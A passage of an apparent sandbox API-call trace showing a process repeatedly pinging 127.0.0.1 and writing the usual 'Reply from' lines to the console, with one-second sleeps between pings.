out: _File=0x76ea4c28) returned 0 [0048.519] _fileno (_File=0x76ea4c28) returned 1 [0048.519] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0048.519] LocalFree (hMem=0xfb8940) returned 0x0 [0048.519] LocalFree (hMem=0xfc7b08) returned 0x0 [0048.519] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xf3eff8, nSize=0x0, Arguments=0xf3eff4 | out: lpBuffer="笈ü杻ó⟘\x94䰨盪✨") returned 0x9 [0048.519] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0048.519] _fileno (_File=0x76ea4c28) returned 1 [0048.519] _get_osfhandle (_FileHandle=1) returned 0x28 [0048.519] GetFileType (hFile=0x28) returned 0x2 [0048.519] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf3efbc | out: lpMode=0xf3efbc) returned 0 [0048.519] GetLastError () returned 0x6 [0048.519] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf3ef20, nSize=0x50 | out: lpBuffer="ó✨") returned 0x0 [0048.519] _fileno (_File=0x76ea4c28) returned 1 [0048.519] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0048.519] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0048.519] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xfb8940 [0048.519] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xfb8940, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0048.519] _fileno (_File=0x76ea4c28) returned 1 [0048.519] _write (in: _FileHandle=1, _Buf=0xfb8940*, _MaxCharCount=0x9 | out: _Buf=0xfb8940*) returned 9 [0048.519] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0048.519] _fileno (_File=0x76ea4c28) returned 1 [0048.519] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0048.519] LocalFree (hMem=0xfb8940) returned 0x0 [0048.519] LocalFree (hMem=0xfc7b08) returned 0x0 [0048.519] Sleep (dwMilliseconds=0x3e8) [0049.522] IcmpSendEcho2Ex (in: IcmpHandle=0xfb6bb8, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xfbc340, RequestSize=0x20, RequestOptions=0xf3f074, ReplyBuffer=0xfc5270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xfc5270) returned 0x1 [0049.523] InetNtopW (in: Family=2, pAddr=0xf3f064, pStringBuf=0xf3f18c, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0049.523] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xf3eff8, nSize=0x0, Arguments=0xf3eff4 | out: lpBuffer="羠ü杻ó⛔\x94䰨盪✣") returned 0x16 [0049.523] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0049.523] _fileno (_File=0x76ea4c28) returned 1 [0049.523] _get_osfhandle (_FileHandle=1) returned 0x28 [0049.523] GetFileType (hFile=0x28) returned 0x2 [0049.523] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf3efbc | out: lpMode=0xf3efbc) returned 0 [0049.523] GetLastError () returned 0x6 [0049.523] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf3ef20, nSize=0x50 | out: lpBuffer="ó✣") returned 0x0 [0049.523] _fileno (_File=0x76ea4c28) returned 1 [0049.523] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0049.523] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0049.523] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xfc7fd8 [0049.523] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xfc7fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0049.523] _fileno (_File=0x76ea4c28) returned 1 [0049.523] _write (in: _FileHandle=1, _Buf=0xfc7fd8*, _MaxCharCount=0x16 | out: _Buf=0xfc7fd8*) returned 22 [0049.523] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0049.523] _fileno (_File=0x76ea4c28) returned 1 [0049.523] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0049.524] LocalFree (hMem=0xfc7fd8) returned 0x0 [0049.524] LocalFree (hMem=0xfc7fa0) returned 0x0 [0049.524] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xf3eff8, nSize=0x0, Arguments=0xf3eff4 | out: lpBuffer="羠ü杻ó⛿\x94䰨盪✼") returned 0x9 [0049.524] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0049.524] _fileno (_File=0x76ea4c28) returned 1 [0049.524] _get_osfhandle (_FileHandle=1) returned 0x28 [0049.524] GetFileType (hFile=0x28) returned 0x2 [0049.524] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf3efbc | out: lpMode=0xf3efbc) returned 0 [0049.524] GetLastError () returned 0x6 [0049.524] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf3ef20, nSize=0x50 | out: lpBuffer="ó✼") returned 0x0 [0049.524] _fileno (_File=0x76ea4c28) returned 1 [0049.524] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0049.524] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0049.524] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xfb8a18 [0049.524] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xfb8a18, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0049.524] _fileno (_File=0x76ea4c28) returned 1 [0049.524] _write (in: _FileHandle=1, _Buf=0xfb8a18*, _MaxCharCount=0x9 | out: _Buf=0xfb8a18*) returned 9 [0049.524] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0049.524] _fileno (_File=0x76ea4c28) returned 1 [0049.524] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0049.524] LocalFree (hMem=0xfb8a18) returned 0x0 [0049.524] LocalFree (hMem=0xfc7fa0) returned 0x0 [0049.524] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xf3effc, nSize=0x0, Arguments=0xf3eff8 | out: lpBuffer="羠ü杻ó➷\x94䰨盪✧") returned 0x9 [0049.524] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0049.524] _fileno (_File=0x76ea4c28) returned 1 [0049.524] _get_osfhandle (_FileHandle=1) returned 0x28 [0049.524] GetFileType (hFile=0x28) returned 0x2 [0049.524] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf3efc0 | out: lpMode=0xf3efc0) returned 0 [0049.524] GetLastError () returned 0x6 [0049.524] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf3ef24, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0049.524] _fileno (_File=0x76ea4c28) returned 1 [0049.524] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0049.524] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0049.524] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xfb8940 [0049.524] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xfb8940, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0049.524] _fileno (_File=0x76ea4c28) returned 1 [0049.524] _write (in: _FileHandle=1, _Buf=0xfb8940*, _MaxCharCount=0x9 | out: _Buf=0xfb8940*) returned 9 [0049.524] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0049.524] _fileno (_File=0x76ea4c28) returned 1 [0049.524] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0049.524] LocalFree (hMem=0xfb8940) returned 0x0 [0049.524] LocalFree (hMem=0xfc7fa0) returned 0x0 [0049.524] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xf3eff8, nSize=0x0, Arguments=0xf3eff4 | out: lpBuffer="羠ü杻ó⟘\x94䰨盪✨") returned 0x9 [0049.524] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0049.524] _fileno (_File=0x76ea4c28) returned 1 [0049.524] _get_osfhandle (_FileHandle=1) returned 0x28 [0049.524] GetFileType (hFile=0x28) returned 0x2 [0049.524] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf3efbc | out: lpMode=0xf3efbc) returned 0 [0049.524] GetLastError () returned 0x6 [0049.524] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf3ef20, nSize=0x50 | out: lpBuffer="ó✨") returned 0x0 [0049.524] _fileno (_File=0x76ea4c28) returned 1 [0049.524] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0049.525] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0049.525] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xfb8a18 [0049.525] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xfb8a18, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0049.525] _fileno (_File=0x76ea4c28) returned 1 [0049.525] _write (in: _FileHandle=1, _Buf=0xfb8a18*, _MaxCharCount=0x9 | out: _Buf=0xfb8a18*) returned 9 [0049.525] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0049.525] _fileno (_File=0x76ea4c28) returned 1 [0049.525] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0049.525] LocalFree (hMem=0xfb8a18) returned 0x0 [0049.525] LocalFree (hMem=0xfc7fa0) returned 0x0 [0049.525] Sleep (dwMilliseconds=0x3e8) [0050.538] IcmpSendEcho2Ex (in: IcmpHandle=0xfb6bb8, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xfbc340, RequestSize=0x20, RequestOptions=0xf3f074, ReplyBuffer=0xfc5270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xfc5270) returned 0x1 [0050.538] InetNtopW (in: Family=2, pAddr=0xf3f064, pStringBuf=0xf3f18c, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0050.539] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xf3eff8, nSize=0x0, Arguments=0xf3eff4 | out: lpBuffer="羠ü杻ó⛔\x94䰨盪✣") returned 0x16 [0050.539] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0050.539] _fileno (_File=0x76ea4c28) returned 1 [0050.539] _get_osfhandle (_FileHandle=1) returned 0x28 [0050.539] GetFileType (hFile=0x28) returned 0x2 [0050.539] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf3efbc | out: lpMode=0xf3efbc) returned 0 [0050.539] GetLastError () returned 0x6 [0050.539] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf3ef20, nSize=0x50 | out: lpBuffer="ó✣") returned 0x0 [0050.539] _fileno (_File=0x76ea4c28) returned 1 [0050.539] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0050.539] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0050.539] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xfc7fd8 [0050.539] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xfc7fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0050.539] _fileno (_File=0x76ea4c28) returned 1 [0050.539] _write (in: _FileHandle=1, _Buf=0xfc7fd8*, _MaxCharCount=0x16 | out: _Buf=0xfc7fd8*) returned 22 [0050.539] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0050.539] _fileno (_File=0x76ea4c28) returned 1 [0050.539] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0050.539] LocalFree (hMem=0xfc7fd8) returned 0x0 [0050.539] LocalFree (hMem=0xfc7fa0) returned 0x0 [0050.539] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xf3eff8, nSize=0x0, Arguments=0xf3eff4 | out: lpBuffer="羠ü杻ó⛿\x94䰨盪✼") returned 0x9 [0050.539] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0050.539] _fileno (_File=0x76ea4c28) returned 1 [0050.539] _get_osfhandle (_FileHandle=1) returned 0x28 [0050.539] GetFileType (hFile=0x28) returned 0x2 [0050.539] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf3efbc | out: lpMode=0xf3efbc) returned 0 [0050.539] GetLastError () returned 0x6 [0050.539] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf3ef20, nSize=0x50 | out: lpBuffer="ó✼") returned 0x0 [0050.539] _fileno (_File=0x76ea4c28) returned 1 [0050.539] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0050.539] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0050.539] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xfb8a60 [0050.539] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xfb8a60, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0050.539] _fileno (_File=0x76ea4c28) returned 1 [0050.539] _write (in: _FileHandle=1, _Buf=0xfb8a60*, _MaxCharCount=0x9 | out: _Buf=0xfb8a60*) returned 9 [0050.539] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0050.539] _fileno (_File=0x76ea4c28) returned 1 [0050.539] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0050.539] LocalFree (hMem=0xfb8a60) returned 0x0 [0050.539] LocalFree (hMem=0xfc7fa0) returned 0x0 [0050.539] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xf3effc, nSize=0x0, Arguments=0xf3eff8 | out: lpBuffer="羠ü杻ó➷\x94䰨盪✧") returned 0x9 [0050.539] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0050.539] _fileno (_File=0x76ea4c28) returned 1 [0050.539] _get_osfhandle (_FileHandle=1) returned 0x28 [0050.540] GetFileType (hFile=0x28) returned 0x2 [0050.540] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf3efc0 | out: lpMode=0xf3efc0) returned 0 [0050.540] GetLastError () returned 0x6 [0050.540] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf3ef24, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0050.540] _fileno (_File=0x76ea4c28) returned 1 [0050.540] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0050.540] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0050.540] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xfb8a60 [0050.540] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xfb8a60, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0050.540] _fileno (_File=0x76ea4c28) returned 1 [0050.540] _write (in: _FileHandle=1, _Buf=0xfb8a60*, _MaxCharCount=0x9 | out: _Buf=0xfb8a60*) returned 9 [0050.540] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0050.540] _fileno (_File=0x76ea4c28) returned 1 [0050.540] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0050.540] LocalFree (hMem=0xfb8a60) returned 0x0 [0050.540] LocalFree (hMem=0xfc7fa0) returned 0x0 [0050.540] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xf3eff8, nSize=0x0, Arguments=0xf3eff4 | out: lpBuffer="羠ü杻ó⟘\x94䰨盪✨") returned 0x9 [0050.540] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0050.540] _fileno (_File=0x76ea4c28) returned 1 [0050.540] _get_osfhandle (_FileHandle=1) returned 0x28 [0050.540] GetFileType (hFile=0x28) returned 0x2 [0050.540] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf3efbc | out: lpMode=0xf3efbc) returned 0 [0050.540] GetLastError () returned 0x6 [0050.540] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf3ef20, nSize=0x50 | out: lpBuffer="ó✨") returned 0x0 [0050.540] _fileno (_File=0x76ea4c28) returned 1 [0050.540] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0050.540] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0050.540] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xfb89a0 [0050.540] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xfb89a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0050.540] _fileno (_File=0x76ea4c28) returned 1 [0050.540] _write (in: _FileHandle=1, _Buf=0xfb89a0*, _MaxCharCount=0x9 | out: _Buf=0xfb89a0*) returned 9 [0050.540] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0050.540] _fileno (_File=0x76ea4c28) returned 1 [0050.540] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0050.540] LocalFree (hMem=0xfb89a0) returned 0x0 [0050.540] LocalFree (hMem=0xfc7fa0) returned 0x0 [0050.540] Sleep (dwMilliseconds=0x3e8) [0051.554] IcmpSendEcho2Ex (in: IcmpHandle=0xfb6bb8, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xfbc340, RequestSize=0x20, RequestOptions=0xf3f074, ReplyBuffer=0xfc5270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xfc5270) returned 0x1 [0051.554] InetNtopW (in: Family=2, pAddr=0xf3f064, pStringBuf=0xf3f18c, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0051.555] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xf3eff8, nSize=0x0, Arguments=0xf3eff4 | out: lpBuffer="羠ü杻ó⛔\x94䰨盪✣") returned 0x16 [0051.555] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0051.555] _fileno (_File=0x76ea4c28) returned 1 [0051.555] _get_osfhandle (_FileHandle=1) returned 0x28 [0051.555] GetFileType (hFile=0x28) returned 0x2 [0051.555] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf3efbc | out: lpMode=0xf3efbc) returned 0 [0051.555] GetLastError () returned 0x6 [0051.555] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf3ef20, nSize=0x50 | out: lpBuffer="ó✣") returned 0x0 [0051.555] _fileno (_File=0x76ea4c28) returned 1 [0051.555] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0051.555] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0051.555] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xfc7fd8 [0051.555] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xfc7fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0051.555] _fileno (_File=0x76ea4c28) returned 1 [0051.555] _write (in: _FileHandle=1, _Buf=0xfc7fd8*, _MaxCharCount=0x16 | out: _Buf=0xfc7fd8*) returned 22 [0051.555] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0051.555] _fileno (_File=0x76ea4c28) returned 1 [0051.555] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0051.555] LocalFree (hMem=0xfc7fd8) returned 0x0 [0051.555] LocalFree (hMem=0xfc7fa0) returned 0x0 [0051.555] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xf3eff8, nSize=0x0, Arguments=0xf3eff4 | out: lpBuffer="羠ü杻ó⛿\x94䰨盪✼") returned 0x9 [0051.555] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0051.555] _fileno (_File=0x76ea4c28) returned 1 [0051.555] _get_osfhandle (_FileHandle=1) returned 0x28 [0051.555] GetFileType (hFile=0x28) returned 0x2 [0051.555] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf3efbc | out: lpMode=0xf3efbc) returned 0 [0051.555] GetLastError () returned 0x6 [0051.555] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf3ef20, nSize=0x50 | out: lpBuffer="ó✼") returned 0x0 [0051.555] _fileno (_File=0x76ea4c28) returned 1 [0051.555] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0051.555] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0051.555] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xfb8a18 [0051.555] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xfb8a18, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0051.555] _fileno (_File=0x76ea4c28) returned 1 [0051.555] _write (in: _FileHandle=1, _Buf=0xfb8a18*, _MaxCharCount=0x9 | out: _Buf=0xfb8a18*) returned 9 [0051.555] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0051.555] _fileno (_File=0x76ea4c28) returned 1 [0051.555] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0051.555] LocalFree (hMem=0xfb8a18) returned 0x0 [0051.555] LocalFree (hMem=0xfc7fa0) returned 0x0 [0051.555] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xf3effc, nSize=0x0, Arguments=0xf3eff8 | out: lpBuffer="羠ü杻ó➷\x94䰨盪✧") returned 0x9 [0051.555] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0051.555] _fileno (_File=0x76ea4c28) returned 1 [0051.555] _get_osfhandle (_FileHandle=1) returned 0x28 [0051.555] GetFileType (hFile=0x28) returned 0x2 [0051.555] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf3efc0 | out: lpMode=0xf3efc0) returned 0 [0051.555] GetLastError () returned 0x6 [0051.555] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf3ef24, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0051.556] _fileno (_File=0x76ea4c28) returned 1 [0051.556] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0051.556] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0051.556] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xfb8970 [0051.556] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xfb8970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0051.556] _fileno (_File=0x76ea4c28) returned 1 [0051.556] _write (in: _FileHandle=1, _Buf=0xfb8970*, _MaxCharCount=0x9 | out: _Buf=0xfb8970*) returned 9 [0051.556] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0051.556] _fileno (_File=0x76ea4c28) returned 1 [0051.556] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0051.556] LocalFree (hMem=0xfb8970) returned 0x0 [0051.556] LocalFree (hMem=0xfc7fa0) returned 0x0 [0051.556] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xf3eff8, nSize=0x0, Arguments=0xf3eff4 | out: lpBuffer="羠ü杻ó⟘\x94䰨盪✨") returned 0x9 [0051.556] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0051.556] _fileno (_File=0x76ea4c28) returned 1 [0051.556] _get_osfhandle (_FileHandle=1) returned 0x28 [0051.556] GetFileType (hFile=0x28) returned 0x2 [0051.556] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf3efbc | out: lpMode=0xf3efbc) returned 0 [0051.556] GetLastError () returned 0x6 [0051.556] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf3ef20, nSize=0x50 | out: lpBuffer="ó✨") returned 0x0 [0051.556] _fileno (_File=0x76ea4c28) returned 1 [0051.556] _setmode (_FileHandle=1, _Mode=32768) returned 16384 